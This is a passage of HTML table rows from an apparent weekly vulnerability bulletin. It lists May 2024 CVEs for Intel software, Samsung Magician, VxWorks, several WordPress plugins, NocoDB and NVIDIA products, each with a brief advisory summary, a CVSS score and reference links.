<td>Uncontrolled search path in Intel(R) Graphics Command Center Service bundled in some Intel(R) Graphics Windows DCH driver software before versions 31.0.101.3790/31.0.101.2114 may allow an authenticated user to potentially enable escalation of privilege via local access.</td>
<td>2024-05-16</td>
<td><a href="https://nvd.nist.gov/cvss.cfm?version=2&amp;name=CVE-2023-43751&amp;vector=CVSS:3.1/AV:L/AC:H/PR:L/UI:R/S:U/C:H/I:H/A:H" target="_blank" title="CVSS V3 Score">6.7</a></td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2023-43751" target="_blank">CVE-2023-43751</a><br><a href="https://www.intel.com/content/www/us/en/security-center/advisory/intel-sa-00937.html" target="_blank">secure@intel.com</a></td>
</tr>
<tr>
<td>n/a--Intel(R) Inspector software<br> </td>
<td>Uncontrolled search path in some Intel(R) Inspector software before version 2024.0 may allow an authenticated user to potentially enable escalation of privilege via local access.</td>
<td>2024-05-16</td>
<td><a href="https://nvd.nist.gov/cvss.cfm?version=2&amp;name=CVE-2024-22379&amp;vector=CVSS:3.1/AV:L/AC:H/PR:L/UI:R/S:U/C:H/I:H/A:H" target="_blank" title="CVSS V3 Score">6.7</a></td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-22379" target="_blank">CVE-2024-22379</a><br><a href="https://www.intel.com/content/www/us/en/security-center/advisory/intel-sa-01043.html" target="_blank">secure@intel.com</a></td>
</tr>
<tr>
<td>n/a--Intel(R) Media SDK software<br> </td>
<td>Improper input validation in Intel(R) Media SDK software all versions may allow an authenticated user to potentially enable denial of service via local access.</td>
<td>2024-05-16</td>
<td><a href="https://nvd.nist.gov/cvss.cfm?version=2&amp;name=CVE-2023-48368&amp;vector=CVSS:3.1/AV:L/AC:L/PR:L/UI:R/S:C/C:N/I:N/A:H" target="_blank" title="CVSS V3 Score">5.9</a></td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2023-48368" target="_blank">CVE-2023-48368</a><br><a href="https://www.intel.com/content/www/us/en/security-center/advisory/intel-sa-00935.html" target="_blank">secure@intel.com</a></td>
</tr>
<tr>
<td>n/a--Intel(R) Media SDK<br> </td>
<td>Improper buffer restrictions in Intel(R) Media SDK all versions may allow an authenticated user to potentially enable escalation of privilege via local access.</td>
<td>2024-05-16</td>
<td><a href="https://nvd.nist.gov/cvss.cfm?version=2&amp;name=CVE-2023-45221&amp;vector=CVSS:3.1/AV:L/AC:L/PR:L/UI:R/S:U/C:L/I:L/A:L" target="_blank" title="CVSS V3 Score">4.8</a></td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2023-45221" target="_blank">CVE-2023-45221</a><br><a href="https://www.intel.com/content/www/us/en/security-center/advisory/intel-sa-00935.html" target="_blank">secure@intel.com</a></td>
</tr>
<tr>
<td>n/a--Intel(R) Neural Compressor software<br> </td>
<td>Time-of-check Time-of-use race condition in Intel(R) Neural Compressor software before version 2.5.0 may allow an authenticated user to potentially enable information disclosure via local access.</td>
<td>2024-05-16</td>
<td><a href="https://nvd.nist.gov/cvss.cfm?version=2&amp;name=CVE-2024-21792&amp;vector=CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:N/A:N" target="_blank" title="CVSS V3 Score">4.7</a></td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-21792" target="_blank">CVE-2024-21792</a><br><a href="https://www.intel.com/content/www/us/en/security-center/advisory/intel-sa-01109.html" target="_blank">secure@intel.com</a></td>
</tr>
<tr>
<td>n/a--Intel(R) PCM software<br> </td>
<td>Uncontrolled search path in some Intel(R) PCM software before version 202311 may allow an authenticated user to potentially enable escalation of privilege via local access.</td>
<td>2024-05-16</td>
<td><a href="https://nvd.nist.gov/cvss.cfm?version=2&amp;name=CVE-2024-21818&amp;vector=CVSS:3.1/AV:L/AC:H/PR:L/UI:R/S:U/C:H/I:H/A:H" target="_blank" title="CVSS V3 Score">6.7</a></td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-21818" target="_blank">CVE-2024-21818</a><br><a href="https://www.intel.com/content/www/us/en/security-center/advisory/intel-sa-01035.html" target="_blank">secure@intel.com</a></td>
</tr>
<tr>
<td>n/a--Intel(R) PROSet/Wireless WiFi software for Windows<br> </td>
<td>Race condition for some some Intel(R) PROSet/Wireless WiFi software for Windows before version 23.20 may allow an unauthenticated user to potentially enable denial of service via adjacent access.</td>
<td>2024-05-16</td>
<td><a href="https://nvd.nist.gov/cvss.cfm?version=2&amp;name=CVE-2023-40536&amp;vector=CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:C/C:N/I:N/A:L" target="_blank" title="CVSS V3 Score">4.3</a></td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2023-40536" target="_blank">CVE-2023-40536</a><br><a href="https://www.intel.com/content/www/us/en/security-center/advisory/intel-sa-01039.html" target="_blank">secure@intel.com</a></td>
</tr>
<tr>
<td>n/a--Intel(R) PROSet/Wireless WiFi software for linux<br> </td>
<td>Improper input validation for some Intel(R) PROSet/Wireless WiFi software for linux before version 23.20 may allow an unauthenticated user to potentially enable denial of service via adjacent access.</td>
<td>2024-05-16</td>
<td><a href="https://nvd.nist.gov/cvss.cfm?version=2&amp;name=CVE-2023-47210&amp;vector=CVSS:3.1/AV:A/AC:L/PR:N/UI:N/S:C/C:N/I:N/A:L" target="_blank" title="CVSS V3 Score">4.7</a></td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2023-47210" target="_blank">CVE-2023-47210</a><br><a href="https://www.intel.com/content/www/us/en/security-center/advisory/intel-sa-01039.html" target="_blank">secure@intel.com</a></td>
</tr>
<tr>
<td>n/a--Intel(R) PROSet/Wireless WiFi software<br> </td>
<td>Improper input validation for some Intel(R) PROSet/Wireless WiFi software before version 23.20 may allow an unauthenticated user to potentially enable denial of service via adjacent access.</td>
<td>2024-05-16</td>
<td><a href="https://nvd.nist.gov/cvss.cfm?version=2&amp;name=CVE-2023-38417&amp;vector=CVSS:3.1/AV:A/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L" target="_blank" title="CVSS V3 Score">4.3</a></td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2023-38417" target="_blank">CVE-2023-38417</a><br><a href="https://www.intel.com/content/www/us/en/security-center/advisory/intel-sa-01039.html" target="_blank">secure@intel.com</a></td>
</tr>
<tr>
<td>n/a--Intel(R) Power Gadget software for Windows<br> </td>
<td>Insecure inherited permissions in Intel(R) Power Gadget software for Windows all versions may allow an authenticated user to potentially enable escalation of privilege via local access.</td>
<td>2024-05-16</td>
<td><a href="https://nvd.nist.gov/cvss.cfm?version=2&amp;name=CVE-2023-45736&amp;vector=CVSS:3.1/AV:L/AC:H/PR:L/UI:R/S:U/C:H/I:H/A:H" target="_blank" title="CVSS V3 Score">6.7</a></td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2023-45736" target="_blank">CVE-2023-45736</a><br><a href="https://www.intel.com/content/www/us/en/security-center/advisory/intel-sa-01037.html" target="_blank">secure@intel.com</a></td>
</tr>
<tr>
<td>n/a--Intel(R) Power Gadget software for Windows<br> </td>
<td>NULL pointer dereference in Intel(R) Power Gadget software for Windows all versions may allow an authenticated user to potentially enable denial of service via local access.</td>
<td>2024-05-16</td>
<td><a href="https://nvd.nist.gov/cvss.cfm?version=2&amp;name=CVE-2023-41234&amp;vector=CVSS:3.1/AV:L/AC:L/PR:L/UI:R/S:U/C:N/I:N/A:H" target="_blank" title="CVSS V3 Score">5</a></td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2023-41234" target="_blank">CVE-2023-41234</a><br><a href="https://www.intel.com/content/www/us/en/security-center/advisory/intel-sa-01037.html" target="_blank">secure@intel.com</a></td>
</tr>
<tr>
<td>n/a--Intel(R) Power Gadget software for Windwos<br> </td>
<td>Improper initialization in some Intel(R) Power Gadget software for Windwos all versions may allow an authenticated user to potentially enable denial of service via local access.</td>
<td>2024-05-16</td>
<td><a href="https://nvd.nist.gov/cvss.cfm?version=2&amp;name=CVE-2023-45315&amp;vector=CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H" target="_blank" title="CVSS V3 Score">5.5</a></td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2023-45315" target="_blank">CVE-2023-45315</a><br><a href="https://www.intel.com/content/www/us/en/security-center/advisory/intel-sa-01037.html" target="_blank">secure@intel.com</a></td>
</tr>
<tr>
<td>n/a--Intel(R) Power Gadget software for macOS<br> </td>
<td>Incomplete cleanup in Intel(R) Power Gadget software for macOS all versions may allow an authenticated user to potentially enable denial of service via local access.</td>
<td>2024-05-16</td>
<td><a href="https://nvd.nist.gov/cvss.cfm?version=2&amp;name=CVE-2023-45846&amp;vector=CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H" target="_blank" title="CVSS V3 Score">5.5</a></td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2023-45846" target="_blank">CVE-2023-45846</a><br><a href="https://www.intel.com/content/www/us/en/security-center/advisory/intel-sa-01037.html" target="_blank">secure@intel.com</a></td>
</tr>
<tr>
<td>n/a--Intel(R) Processor Diagnostic Tool software<br> </td>
<td>Uncontrolled search path in some Intel(R) Processor Diagnostic Tool software before version 4.1.9.41 may allow an authenticated user to potentially enable escalation of privilege via local access.</td>
<td>2024-05-16</td>
<td><a href="https://nvd.nist.gov/cvss.cfm?version=2&amp;name=CVE-2024-21831&amp;vector=CVSS:3.1/AV:L/AC:H/PR:L/UI:R/S:U/C:H/I:H/A:H" target="_blank" title="CVSS V3 Score">6.7</a></td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-21831" target="_blank">CVE-2024-21831</a><br><a href="https://www.intel.com/content/www/us/en/security-center/advisory/intel-sa-01069.html" target="_blank">secure@intel.com</a></td>
</tr>
<tr>
<td>n/a--Intel(R) Processor Identification Utility software<br> </td>
<td>Uncontrolled search path in some Intel(R) Processor Identification Utility software before versions 6.10.34.1129, 7.1.6 may allow an authenticated user to potentially enable escalation of privilege via local access.</td>
<td>2024-05-16</td>
<td><a href="https://nvd.nist.gov/cvss.cfm?version=2&amp;name=CVE-2024-21774&amp;vector=CVSS:3.1/AV:L/AC:H/PR:L/UI:R/S:U/C:H/I:H/A:H" target="_blank" title="CVSS V3 Score">6.7</a></td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-21774" target="_blank">CVE-2024-21774</a><br><a href="https://www.intel.com/content/www/us/en/security-center/advisory/intel-sa-01054.html" target="_blank">secure@intel.com</a></td>
</tr>
<tr>
<td>n/a--Intel(R) Quartus(R) Prime Lite Edition Design software<br> </td>
<td>Improper conditions check for some Intel(R) Quartus(R) Prime Lite Edition Design software before version 23.1 may allow an authenticated user to potentially enable escalation of privilege via local access.</td>
<td>2024-05-16</td>
<td><a href="https://nvd.nist.gov/cvss.cfm?version=2&amp;name=CVE-2024-21809&amp;vector=CVSS:3.1/AV:L/AC:H/PR:L/UI:R/S:U/C:H/I:H/A:H" target="_blank" title="CVSS V3 Score">6.7</a></td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-21809" target="_blank">CVE-2024-21809</a><br><a href="https://www.intel.com/content/www/us/en/security-center/advisory/intel-sa-01055.html" target="_blank">secure@intel.com</a></td>
</tr>
<tr>
<td>n/a--Intel(R) Quartus(R) Prime Lite Edition Design software<br> </td>
<td>Uncontrolled search path in some Intel(R) Quartus(R) Prime Lite Edition Design software before version 23.1 may allow an authenticated user to potentially enable escalation of privilege via local access.</td>
<td>2024-05-16</td>
<td><a href="https://nvd.nist.gov/cvss.cfm?version=2&amp;name=CVE-2024-21837&amp;vector=CVSS:3.1/AV:L/AC:H/PR:L/UI:R/S:U/C:H/I:H/A:H" target="_blank" title="CVSS V3 Score">6.7</a></td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-21837" target="_blank">CVE-2024-21837</a><br><a href="https://www.intel.com/content/www/us/en/security-center/advisory/intel-sa-01055.html" target="_blank">secure@intel.com</a></td>
</tr>
<tr>
<td>n/a--Intel(R) Quartus(R) Prime Pro Edition Design software<br> </td>
<td>Uncontrolled search path in some Intel(R) Quartus(R) Prime Pro Edition Design software before version 23.4 may allow an authenticated user to potentially enable escalation of privilege via local access.</td>
<td>2024-05-16</td>
<td><a href="https://nvd.nist.gov/cvss.cfm?version=2&amp;name=CVE-2024-21777&amp;vector=CVSS:3.1/AV:L/AC:H/PR:L/UI:R/S:U/C:H/I:H/A:H" target="_blank" title="CVSS V3 Score">6.7</a></td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-21777" target="_blank">CVE-2024-21777</a><br><a href="https://www.intel.com/content/www/us/en/security-center/advisory/intel-sa-01055.html" target="_blank">secure@intel.com</a></td>
</tr>
<tr>
<td>n/a--Intel(R) Quartus(R) Prime Standard Edition Design software<br> </td>
<td>Uncontrolled search path in some Intel(R) Quartus(R) Prime Standard Edition Design software before version 23.1 may allow an authenticated user to potentially enable escalation of privilege via local access.</td>
<td>2024-05-16</td>
<td><a href="https://nvd.nist.gov/cvss.cfm?version=2&amp;name=CVE-2024-21862&amp;vector=CVSS:3.1/AV:L/AC:H/PR:L/UI:R/S:U/C:H/I:H/A:H" target="_blank" title="CVSS V3 Score">6.7</a></td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-21862" target="_blank">CVE-2024-21862</a><br><a href="https://www.intel.com/content/www/us/en/security-center/advisory/intel-sa-01055.html" target="_blank">secure@intel.com</a></td>
</tr>
<tr>
<td>n/a--Intel(R) TDX module software<br> </td>
<td>Improper input validation in some Intel(R) TDX module software before version 1.5.05.46.698 may allow a privileged user to potentially enable escalation of privilege via local access.</td>
<td>2024-05-16</td>
<td><a href="https://nvd.nist.gov/cvss.cfm?version=2&amp;name=CVE-2023-47855&amp;vector=CVSS:3.1/AV:L/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:N" target="_blank" title="CVSS V3 Score">6</a></td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2023-47855" target="_blank">CVE-2023-47855</a><br><a href="https://www.intel.com/content/www/us/en/security-center/advisory/intel-sa-01036.html" target="_blank">secure@intel.com</a></td>
</tr>
<tr>
<td>n/a--Intel(R) VTune(TM) Profiler software<br> </td>
<td>Uncontrolled search path element in some Intel(R) VTune(TM) Profiler software before version 2024.0 may allow an authenticated user to potentially enable escalation of privilege via local access.</td>
<td>2024-05-16</td>
<td><a href="https://nvd.nist.gov/cvss.cfm?version=2&amp;name=CVE-2023-45320&amp;vector=CVSS:3.1/AV:L/AC:H/PR:L/UI:R/S:U/C:H/I:H/A:H" target="_blank" title="CVSS V3 Score">6.7</a></td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2023-45320" target="_blank">CVE-2023-45320</a><br><a href="https://www.intel.com/content/www/us/en/security-center/advisory/intel-sa-01034.html" target="_blank">secure@intel.com</a></td>
</tr>
<tr>
<td>n/a--Intel(R) Wireless Bluetooth products for Windows<br> </td>
<td>Improper access control for some Intel(R) Wireless Bluetooth products for Windows before version 23.20 may allow an authenticated user to potentially enable denial of service via local access.</td>
<td>2024-05-16</td>
<td><a href="https://nvd.nist.gov/cvss.cfm?version=2&amp;name=CVE-2023-47859&amp;vector=CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H" target="_blank" title="CVSS V3 Score">5.5</a></td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2023-47859" target="_blank">CVE-2023-47859</a><br><a href="https://www.intel.com/content/www/us/en/security-center/advisory/intel-sa-01039.html" target="_blank">secure@intel.com</a></td>
</tr>
<tr>
<td>n/a--Intel(R) Wireless Bluetooth(R) products for Windows<br> </td>
<td>Improper conditions check for some Intel(R) Wireless Bluetooth(R) products for Windows before version 23.20 may allow a privileged user to potentially enable denial of service via local access.</td>
<td>2024-05-16</td>
<td><a href="https://nvd.nist.gov/cvss.cfm?version=2&amp;name=CVE-2023-45845&amp;vector=CVSS:3.1/AV:L/AC:L/PR:H/UI:N/S:U/C:N/I:N/A:H" target="_blank" title="CVSS V3 Score">4.4</a></td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2023-45845" target="_blank">CVE-2023-45845</a><br><a href="https://www.intel.com/content/www/us/en/security-center/advisory/intel-sa-01039.html" target="_blank">secure@intel.com</a></td>
</tr>
<tr>
<td>n/a--Intel(R) XTU software<br> </td>
<td>Insecure inherited permissions in some Intel(R) XTU software before version 7.14.0.15 may allow an authenticated user to potentially enable escalation of privilege via local access.</td>
<td>2024-05-16</td>
<td><a href="https://nvd.nist.gov/cvss.cfm?version=2&amp;name=CVE-2024-21835&amp;vector=CVSS:3.1/AV:L/AC:H/PR:L/UI:R/S:U/C:H/I:H/A:H" target="_blank" title="CVSS V3 Score">6.7</a></td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-21835" target="_blank">CVE-2024-21835</a><br><a href="https://www.intel.com/content/www/us/en/security-center/advisory/intel-sa-01066.html" target="_blank">secure@intel.com</a></td>
</tr>
<tr>
<td>n/a--Libva software maintained by Intel(R)<br> </td>
<td>Uncontrolled search path in some Libva software maintained by Intel(R) before version 2.20.0 may allow an authenticated user to potentially enable escalation of privilege via local access.</td>
<td>2024-05-16</td>
<td><a href="https://nvd.nist.gov/cvss.cfm?version=2&amp;name=CVE-2023-39929&amp;vector=CVSS:3.1/AV:L/AC:H/PR:L/UI:R/S:U/C:H/I:H/A:H" target="_blank" title="CVSS V3 Score">6.7</a></td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2023-39929" target="_blank">CVE-2023-39929</a><br><a href="https://www.intel.com/content/www/us/en/security-center/advisory/intel-sa-01012.html" target="_blank">secure@intel.com</a></td>
</tr>
<tr>
<td>n/a--UEFI firmware for some Intel(R) Server Board S2600BP products<br> </td>
<td>Improper input validation of EpsdSrMgmtConfig in UEFI firmware for some Intel(R) Server Board S2600BP products may allow a privileged user to potentially enable denial of service via local access.</td>
<td>2024-05-16</td>
<td><a href="https://nvd.nist.gov/cvss.cfm?version=2&amp;name=CVE-2023-22662&amp;vector=CVSS:3.1/AV:L/AC:H/PR:H/UI:R/S:C/C:N/I:L/A:H" target="_blank" title="CVSS V3 Score">5.8</a></td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2023-22662" target="_blank">CVE-2023-22662</a><br><a href="https://www.intel.com/content/www/us/en/security-center/advisory/intel-sa-01080.html" target="_blank">secure@intel.com</a></td>
</tr>
<tr>
<td>n/a--n/a<br> </td>
<td>An issue was discovered in Samsung Magician 8.0.0 on macOS. Because symlinks are used during the installation process, an attacker can escalate privileges via arbitrary file permission writes. (The attacker must already have user privileges, and an administrator password must be entered during the program installation stage for privilege escalation.)</td>
<td>2024-05-14</td>
<td><a href="https://nvd.nist.gov/cvss.cfm?version=2&amp;name=CVE-2024-31952&amp;vector=CVSS:3.1/AV:L/AC:H/PR:L/UI:R/S:U/C:H/I:H/A:H" target="_blank" title="CVSS V3 Score">6.7</a></td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-31952" target="_blank">CVE-2024-31952</a><br><a href="https://semiconductor.samsung.com/support/quality-support/product-security-updates/cve-2024-31952/" target="_blank">cve@mitre.org</a></td>
</tr>
<tr>
<td>n/a--n/a<br> </td>
<td>An issue was discovered in Samsung Magician 8.0.0 on macOS. Because it is possible to tamper with the directory and executable files used during the installation process, an attacker can escalate privileges through arbitrary code execution. (The attacker must already have user privileges, and an administrator password must be entered during the program installation stage for privilege escalation.)</td>
<td>2024-05-14</td>
<td><a href="https://nvd.nist.gov/cvss.cfm?version=2&amp;name=CVE-2024-31953&amp;vector=CVSS:3.1/AV:L/AC:H/PR:L/UI:R/S:U/C:H/I:H/A:H" target="_blank" title="CVSS V3 Score">6.7</a></td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-31953" target="_blank">CVE-2024-31953</a><br><a href="https://semiconductor.samsung.com/support/quality-support/product-security-updates/cve-2024-31953/" target="_blank">cve@mitre.org</a></td>
</tr>
<tr>
<td>n/a--n/a<br> </td>
<td>A crafted network packet may cause a buffer overrun in Wind River VxWorks 7 through 23.09.</td>
<td>2024-05-14</td>
<td><a href="https://nvd.nist.gov/cvss.cfm?version=2&amp;name=CVE-2024-28759&amp;vector=CVSS:3.1/AV:A/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L" target="_blank" title="CVSS V3 Score">4.3</a></td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-28759" target="_blank">CVE-2024-28759</a><br><a href="https://support2.windriver.com/index.php?page=cve&amp;on=view&amp;id=CVE-2024-28759" target="_blank">cve@mitre.org</a><br><a href="https://windriver.com/" target="_blank">cve@mitre.org</a></td>
</tr>
<tr>
<td>n/a--onboard video driver software for Intel(R) Server Boards based on Intel(R) 62X Chipset<br> </td>
<td>Incorrect default permissions in some onboard video driver software before version 1.14 for Intel(R) Server Boards based on Intel(R) 62X Chipset may allow an authenticated user to potentially enable escalation of privilege via local access.</td>
<td>2024-05-16</td>
<td><a href="https://nvd.nist.gov/cvss.cfm?version=2&amp;name=CVE-2023-42668&amp;vector=CVSS:3.1/AV:L/AC:H/PR:L/UI:R/S:U/C:H/I:H/A:H" target="_blank" title="CVSS V3 Score">6.7</a></td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2023-42668" target="_blank">CVE-2023-42668</a><br><a href="https://www.intel.com/content/www/us/en/security-center/advisory/intel-sa-00962.html" target="_blank">secure@intel.com</a></td>
</tr>
<tr>
<td>nalam-1--Magical Addons For Elementor ( Header Footer Builder, Free Elementor Widgets, Elementor Templates Library )<br> </td>
<td>The Magical Addons For Elementor ( Header Footer Builder, Free Elementor Widgets, Elementor Templates Library ) plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's text effect widget in all versions up to, and including, 1.1.37 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.</td>
<td>2024-05-14</td>
<td><a href="https://nvd.nist.gov/cvss.cfm?version=2&amp;name=CVE-2024-2923&amp;vector=CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N" target="_blank" title="CVSS V3 Score">6.4</a></td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-2923" target="_blank">CVE-2024-2923</a><br><a href="https://plugins.trac.wordpress.org/changeset?sfp_email=&amp;sfph_mail=&amp;reponame=&amp;old=3078558%40magical-addons-for-elementor&amp;new=3078558%40magical-addons-for-elementor&amp;sfp_email=&amp;sfph_mail=" target="_blank">security@wordfence.com</a><br><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/733f5ded-e8cb-4895-b938-889cea32f027?source=cve" target="_blank">security@wordfence.com</a></td>
</tr>
<tr>
<td>nko--Visual Portfolio, Photo Gallery &amp; Post Grid<br> </td>
<td>The Visual Portfolio, Photo Gallery &amp; Post Grid plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'title_tag' parameter in all versions up to, and including, 3.3.2 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with author-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.</td>
<td>2024-05-15</td>
<td><a href="https://nvd.nist.gov/cvss.cfm?version=2&amp;name=CVE-2024-4363&amp;vector=CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N" target="_blank" title="CVSS V3 Score">6.4</a></td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-4363" target="_blank">CVE-2024-4363</a><br><a href="https://plugins.trac.wordpress.org/browser/visual-portfolio/trunk/templates/items-list/item-parts/title.php#L22" target="_blank">security@wordfence.com</a><br><a href="https://wordpress.org/plugins/visual-portfolio/#developers" target="_blank">security@wordfence.com</a><br><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/ab5e09d8-6fa3-4a5b-bee1-6648df4f4b3b?source=cve" target="_blank">security@wordfence.com</a></td>
</tr>
<tr>
<td>nocodb--nocodb<br> </td>
<td>NocoDB is software for building databases as spreadsheets. Prior to version 0.202.10, an authenticated attacker with create access could conduct a SQL Injection attack on MySQL DB using unescaped `table_name`. This vulnerability may result in leakage of sensitive data in the database. Version 0.202.10 contains a patch for the issue.</td>
<td>2024-05-14</td>
<td><a href="https://nvd.nist.gov/cvss.cfm?version=2&amp;name=CVE-2023-50718&amp;vector=CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:N" target="_blank" title="CVSS V3 Score">6.5</a></td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2023-50718" target="_blank">CVE-2023-50718</a><br><a href="https://github.com/nocodb/nocodb/security/advisories/GHSA-8fxg-mr34-jqr8" target="_blank">security-advisories@github.com</a></td>
</tr>
<tr>
<td>nocodb--nocodb<br> </td>
<td>NocoDB is software for building databases as spreadsheets. Starting in verson 0.202.6 and prior to version 0.202.10, an attacker can upload a html file with malicious content. If user tries to open that file in browser malicious scripts can be executed leading stored cross-site scripting attack. This allows remote attacker to execute JavaScript code in the context of the user accessing the vector. An attacker could have used this vulnerability to execute requests in the name of a logged-in user or potentially collect information about the attacked user by displaying a malicious form. Version 0.202.10 contains a patch for the issue.</td>
<td>2024-05-14</td>
<td><a href="https://nvd.nist.gov/cvss.cfm?version=2&amp;name=CVE-2023-50717&amp;vector=CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:H/I:N/A:N" target="_blank" title="CVSS V3 Score">5.7</a></td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2023-50717" target="_blank">CVE-2023-50717</a><br><a href="https://github.com/nocodb/nocodb/security/advisories/GHSA-qg73-g3cf-vhhh" target="_blank">security-advisories@github.com</a></td>
</tr>
<tr>
<td>nvidia--ChatRTX<br> </td>
<td>NVIDIA ChatRTX for Windows contains a vulnerability in the ChatRTX UI and backend, where a user can cause a clear-text transmission of sensitive information issue by data sniffing. A successful exploit of this vulnerability might lead to information disclosure.</td>
<td>2024-05-14</td>
<td><a href="https://nvd.nist.gov/cvss.cfm?version=2&amp;name=CVE-2024-0098&amp;vector=CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N" target="_blank" title="CVSS V3 Score">5.5</a></td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-0098" target="_blank">CVE-2024-0098</a><br><a href="https://nvidia.custhelp.com/app/answers/detail/a_id/5533" target="_blank">psirt@nvidia.com</a></td>
</tr>
<tr>
<td>nvidia--NVIDIA Triton Inference Server<br> </td>
<td>NVIDIA Triton Inference Server for Linux contains a vulnerability in the tracing API, where a user can corrupt system files. A successful exploit of this vulnerability might lead to denial of service and data tampering.</td>
<td>2024-05-14</td>
<td><a href="https://nvd.nist.gov/cvss.cfm?version=2&amp;name=CVE-2024-0100&amp;vector=CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:H/A:H" target="_blank" title="CVSS V3 Score">6.5</a></td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-0100" target="_blank">CVE-2024-0100</a><br><a href="https://nvidia.custhelp.com/app/answers/detail/a_id/5535" target="_blank">psirt@nvidia.com</a></td>
</tr>
<tr>
<td>nvidia--NVIDIA Triton Inference Server<br> </td>
<td>NVIDIA Triton Inference Server for Linux contains a vulnerability in shared memory APIs, where a user can cause an improper memory access issue by a network API. A successful exploit of this vulnerability might lead to denial of service and data tampering.</td>
<td>2024-05-14</td>
<td><a href="https://nvd.nist.gov/cvss.cfm?version=2&amp;name=CVE-2024-0088&amp;vector=CVSS:3.1/AV:N/AC:H/PR:H/UI:N/S:U/C:L/I:L/A:H" target="_blank" title="CVSS V3 Score">5.5</a></td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-0088" target="_blank">CVE-2024-0088</a><br><a href="https://nvidia.custhelp.com/app/answers/detail/a_id/5535" target="_blank">psirt@nvidia.com</a></td>
</tr>
<tr>
<td>optimole--Image Optimization by Optimole Lazy Load, CDN, Convert WebP &amp; AVIF<br> </td>
<td>The Image Optimization by Optimole - Lazy Load, CDN, Convert WebP &amp; AVIF plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'allow_meme_types' function in versions up to, and including, 3.12.10 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with contributor-level permissions and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.</td>
<td>2024-05-15</td>
<td><a href="https://nvd.nist.gov/cvss.cfm?version=2&amp;name=CVE-2024-4636&amp;vector=CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N" target="_blank" title="CVSS V3 Score">6.4</a></td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-4636" target="_blank">CVE-2024-4636</a><br><a href="https://plugins.trac.wordpress.org/browser/optimole-wp/tags/3.12.10/inc/admin.php#L1828" target="_blank">security@wordfence.com</a><br><a href="https://plugins.trac.wordpress.org/changeset/3086306/" target="_blank">security@wordfence.com</a><br><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/be88566d-fc84-442d-bb34-834ad9f4465b?source=cve" target="_blank">security@wordfence.com</a></td>
</tr>
<tr>
<td>paperless-ngx--paperless-ngx<br> </td>
